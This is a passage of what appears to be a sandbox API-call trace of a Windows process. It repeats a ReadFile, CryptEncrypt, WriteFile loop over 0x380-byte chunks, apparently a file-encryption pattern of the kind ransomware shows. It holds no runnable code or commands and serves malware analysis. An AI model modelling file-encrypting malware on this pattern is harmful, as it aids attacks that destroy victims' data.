lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.928] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.928] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.928] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.928] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.928] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.928] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.928] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.928] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.928] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.929] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.929] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.929] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.929] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.929] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.929] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.929] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.929] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.929] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.929] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.929] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.929] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.929] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.929] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.929] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.929] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.929] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.929] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.929] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.930] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.930] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.930] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.930] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.930] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.930] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.930] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.930] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.930] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.930] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.930] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.930] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.930] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.930] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.931] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.931] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.931] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.931] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.931] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.931] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.931] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.931] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.931] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.931] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.931] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.931] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.931] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.932] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.932] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.932] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.932] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.932] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.932] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.932] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.932] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.932] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.932] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.932] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.932] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.932] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.932] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.933] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.933] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.933] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.933] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.933] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.933] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.933] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.933] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.933] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.933] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.933] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.933] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.933] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.933] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.933] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.933] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.933] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.933] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.933] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.934] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.934] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.934] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, 